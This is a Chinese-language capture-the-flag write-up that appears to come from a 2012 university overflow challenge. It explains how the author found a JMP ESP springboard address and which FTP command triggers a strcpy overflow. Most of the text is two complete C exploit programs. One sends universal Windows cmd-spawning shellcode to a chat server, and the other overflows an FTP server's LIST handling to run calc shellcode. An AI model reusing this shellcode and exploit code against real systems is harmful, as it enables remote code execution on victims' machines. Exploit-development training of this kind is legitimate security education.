buf[508]+"\x12\x45\xfa\x7f"+shellcode
stz 17:47:06
自动定位
半斤八兩 17:47:34
厉害.
半斤八兩 17:47:48
7ffa4512 这个地址我刚GO过去看了,是在线程中的.
GO过去一看,是JMP ESP.妹纸太有才了.我怎么就没有想到.
但是问题又来了,这样,每次启动地址不是会变吗?
我又自作聪明,去 kernel32找 jmp esp - -#
最后经测试,发现,在kenel32下找到的 jmp esp 在虚拟机下测试失败.
但是,妹纸找的地址,在虚拟机下测试,是可以成功的.
在OD alt+m内存窗口中看可以看出, 0x7FFA4512 位于所有模块之外.
是低2G内存中,最高地址部分.图:
黄色圈的地方,是JMP ESP 出现的分页和地址.
红色圈起来的地方,我们可以猜想他在所有 XP SP3下,
是固定不变的,可以做些其它事 (当然,我没有测试过)
JMP ESP指令,正好是跳向栈顶的,也就是我们溢出后的数据.
我们可以精心构造一个溢出数据.而溢出的数据,我们又要跳.
往哪跳? 当然是我们的 shellcode代码. 在OD中,我们可以看见.
断下来的时候, eax处,正好是指向我们输入的数据开始.
那么,我们在溢出的地方,就可以改成指令.
push eax
jmp [esp]
即可.
剩下的,就是构造溢出包和编写shellcode了.
第三题代码:
代码:
#include <windows.h> #include <WINSOCK2.H> #include <stdlib.h> void IsInitSocket() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ return; } /* Confirm that the WinSock DLL supports 2.2.*/ /* Note that if the DLL supports versions greater */ /* than 2.2 in addition to 2.2, it will still return */ /* 2.2 in wVersion since that is the version we */ /* requested. */ if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ WSACleanup( ); return; } } BYTE szChat[] = { // Windows 2000, Windows 2003, Windows XP // Windows Vista, Windows 7通用cmd Shellcode 0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a, 0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78, 0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47, 0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78, 0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c, 0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63, 0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51, 0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72, 0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20, 0x57, 0xff, 0xd0, // 垃圾填充信息 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, // Springboard //0x13, 0x44, 0x87, 0x7c, 0x12, 0x45, 0xfa, 0x7f, //0xb3, 0xb9, 0x42, 0x00, 0x31, 0x31, 0x31, 0x31, // push eax // jmp [esp] 0x50, 0xff, 0x24, 0x24, 0x31, 0x31, 0x31, 0x31 }; DWORD g_dwPort = 0; char g_szIP[30] = {0}; void IsDisplay() { system("color 0a & title 西电第三题溢出题 Chat Exp."); puts("**************************************"); puts("* By 半斤八兩 *"); puts("* Chat exp *"); puts("* Date 2012.10.06 *"); puts("**************************************"); puts(""); puts("请输入Chat IP:"); scanf("%s", g_szIP); puts("请输入Chat Port:"); scanf("%d", &g_dwPort); } int main(int argc, char* argv[]) { IsDisplay(); IsInitSocket(); SOCKET SChat = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); SOCKADDR_IN sChatAddr = {0}; sChatAddr.sin_addr.S_un.S_addr = inet_addr(g_szIP); sChatAddr.sin_family = AF_INET; sChatAddr.sin_port = htons((u_short)g_dwPort); connect(SChat, (sockaddr*)&sChatAddr, sizeof(sChatAddr)); send(SChat, (PCHAR)szChat, sizeof(szChat), 0); puts("CmdShell Successful!"); Sleep(5000); return 0; }
第四题:
第四题说明
FTPServer.exe程序是一个简易的FTP服务器;
FTPServer在处理FTP服务器命令时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以FTP进程权限在系统上执行任意指令;
请你找出bug,并尝试exploit,以打开计算器程序为成功;
需要简要文字叙述;
提交格式可参考第三题给出的附件。
这一题,和第二,第三题,都差不多.
一开始是对 send user send pass 做处理,
发现无法修改EIP.(我没有溢出这方面的经验,是做题的时候,刚学的,所以不知道其它方法)
晚上睡觉的时候,一直在想有没有其它办法,最后想到了,打开M$的FTP.EXE, 输入 HELP.
对里面的命令 一个个测试过去. ,然后对所有易溢出的IAT,下CC断点.
当测试到 dir 这个命令的时候, 发现调用 strcpy. 后面的,就和第三题分析思路,差不多了.
PS:提交的第一个版本,在虚拟机失败的原因是收发包的时候,没有加Sleep.
分析了一天了. 原因居然是没有延迟...真囧~
通过这次事例, 再一次证明, 虚拟机理论速度比物理机物理速度要快~End..
第四题代码:
// FTP.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <windows.h> #include <WINSOCK2.H> #include <stdlib.h> // code by 半斤八兩 // 懒得加包返回判断了. void IsInit() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ return; } /* Confirm that the WinSock DLL supports 2.2.*/ /* Note that if the DLL supports versions greater */ /* than 2.2 in addition to 2.2, it will still return */ /* 2.2 in wVersion since that is the version we */ /* requested. */ if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ WSACleanup( ); return; } } BYTE szShellCode[] = {0x54, 0xec, 0x10, 0x00}; #define MSG_SIZE (0x1000) BYTE szExp[] = { // FTP Hader "PORT" 0x4c, 0x49, 0x53, 0x54, 0x20, // Calc.exe open 0xb8, 0x82, 0x0a, 0x8d, 0x38, 0xd9, 0xc6, 0xd9, 0x74, 0x24, 0xf4, 0x5a, 0x29, 0xc9, 0xb1, 0x23, 0x31, 0x42, 0x12, 0x83, 0xea, 0xfc, 0x03, 0xc0, 0x04, 0x6f, 0xcd, 0x38, 0xf0, 0x2b, 0x2e, 0xc0, 0x01, 0x3f, 0x6b, 0xfc, 0x8a, 0x43, 0x71, 0x84, 0x8d, 0x54, 0xf2, 0x3b, 0x96, 0x21, 0x5a, 0xe3, 0xa7, 0xde, 0x2c, 0x68, 0x93, 0xab, 0xae, 0x80, 0xed, 0x6b, 0x29, 0xf0, 0x8a, 0xac, 0x3e, 0x0f, 0x52, 0xe6, 0xb2, 0x0e, 0x96, 0x1c, 0x38, 0x2b, 0x42, 0xc7, 0xc5, 0x3e, 0x8f, 0x8c, 0x99, 0xe4, 0x4e, 0x78, 0x43, 0x6f, 0x5c, 0x35, 0x07, 0x30, 0x41, 0xc8, 0xfc, 0x45, 0x65, 0x41, 0x03, 0xb2, 0x1f, 0x09, 0x20, 0x40, 0xe3, 0x83, 0xe8, 0x2c, 0x68, 0xa3, 0xd8, 0x29, 0xae, 0x5c, 0x15, 0xba, 0x6f, 0x91, 0xae, 0xcc, 0x73, 0x04, 0x3b, 0x44, 0x84, 0xbd, 0x35, 0x1f, 0x14, 0xf1, 0x46, 0x1f, 0x15, 0x79, 0x2e, 0x23, 0x4a, 0x4c, 0x59, 0x3b, 0x22, 0x27, 0x5d, 0x38, 0x0a, 0x4c, 0xce, 0x56, 0xf5, 0x6b, 0x0c, 0xd5, 0x61, 0x14, 0x2f, 0x93, 0x7c, 0x73, 0x2f, 0x44, 0xe3, 0x1a, 0xa3, 0xe9, 0xe4, 0x90, 0x90, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0xfe, 0x6f, 0x70, 0x65, 0x6e, 0xfe, 0xcc, 0x6a, 0x8b, 0xd8, 0x83, 0xc3, 0x28, 0x53, 0x6a, 0x01, 0x6a, 0xfe, 0x6a, 0xfe, 0x50, 0x83, 0xc0, 0x09, 0x50, 0x6a, 0xfe, 0xff, 0x15, 0xd8, 0x86, 0x45, 0xfe, 0xff, 0x15, 0x2c, 0x86, 0x45, 0xfe, 0xfe, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x34, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x3b, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x3a, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x39, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x38, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, 0x35, 0x35, 0x37, 0x31, 0x31, 0x31, 0x31, 0x32, 0x32, 0x32, 0x32, 0x34, 0x34, 0x34, 0x34, 0x35, // API Function // 宋妹纸的 0x12, 0x45, 0xfa, 0x7f, // 俺的 // 0x03, 0x37, 0x1a, 0x77, // push eax // jmp esp 0x50, 0xff, 0x24, 0x24, 0x0d, 0x0a }; char szUser[MAXBYTE] = "USER test"; char szPass[MAXBYTE] = "PASS test"; BYTE szPort[MAXBYTE] = "PORT 127,0,0,1,"; void IsDisplay() { system("color 0a & title 西电第四题溢出题 EXP."); puts("**************************************"); puts("* By 半斤八兩 *"); puts("* ftp exp *"); puts("* date 2012.10.05 *"); puts("**************************************"); puts(""); puts("请FTP输入用户名:"); scanf("%s", &szUser[5]); puts("请FTP输入密码:"); scanf("%s", &szPass[5]); } int main(int argc, char* argv[]) { // WinExec("calc.exe", 1); // ShellExecuteA(NULL, "open", "calc.exe", NULL, NULL, 1); IsInit(); IsDisplay(); LPBYTE lpMsg = new BYTE[MSG_SIZE]; char szBuf[MAXBYTE] = {0}; int nLen = strlen(szUser); strcpy(szUser + nLen, "\r\n"); nLen = strlen(szPass); strcpy(szPass + nLen, "\r\n"); for(int i = 0; i < MSG_SIZE; i++) { lpMsg<i> = 0x2b; } SOCKET sFtp; sFtp = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); SOCKADDR_IN tagSockAddr = {0}; tagSockAddr.sin_port = htons(21); tagSockAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); tagSockAddr.sin_family = AF_INET; connect(sFtp, (sockaddr*)&tagSockAddr, sizeof(tagSockAddr)); // welcome use ftp recv(sFtp, szBuf, sizeof(szBuf), 0); puts(szBuf); // send user send(sFtp, (LPTSTR)szUser, strlen(szUser), 0); recv(sFtp, szBuf, sizeof(szBuf), 0); puts(szBuf); Sleep(500); // send pass send(sFtp, (LPTSTR)szPass, strlen(szPass), 0); recv(sFtp, szBuf, sizeof(szBuf), 0); puts(szBuf); Sleep(500); // init ftp SOCKET sDir = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); SOCKADDR_IN tagDirAddress = {0}; tagDirAddress.sin_family = AF_INET; tagDirAddress.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); bind(sDir, (sockaddr*)&tagDirAddress, sizeof(tagDirAddress)); nLen = sizeof(tagDirAddress); getsockname(sDir, (sockaddr*)&tagDirAddress, &nLen); listen(sDir, 1); nLen = strlen((PCHAR)szPort); int nOnePort = (tagDirAddress.sin_port -10) / 256; int nTwoPort = 10; char szOnePort[MAXBYTE] = {0}; char szTwoPort[10] = {0}; itoa(nOnePort, szOnePort, 10); nLen = strlen(szOnePort); strcpy(szOnePort + nLen, ","); itoa(nTwoPort, szTwoPort, 10); nLen = strlen((PCHAR)szOnePort); strcpy(szOnePort + nLen, szTwoPort); nLen = strlen((PCHAR)szPort); strcpy((PCHAR)szPort + nLen, szOnePort); nLen = strlen((PCHAR)szPort); strcpy((PCHAR)szPort + nLen, "\r\n"); Sleep(500); // send port send(sFtp, (LPTSTR)szPort, strlen((PCHAR)szPort), 0); recv(sFtp, szBuf, sizeof(szBuf), 0); puts(szBuf); Sleep(500); // send exp send(sFtp, (LPTSTR)szExp, sizeof(szExp), 0); recv(sDir, szBuf, sizeof(szBuf), 0); puts(szBuf); Sleep(500); return 0; } </i>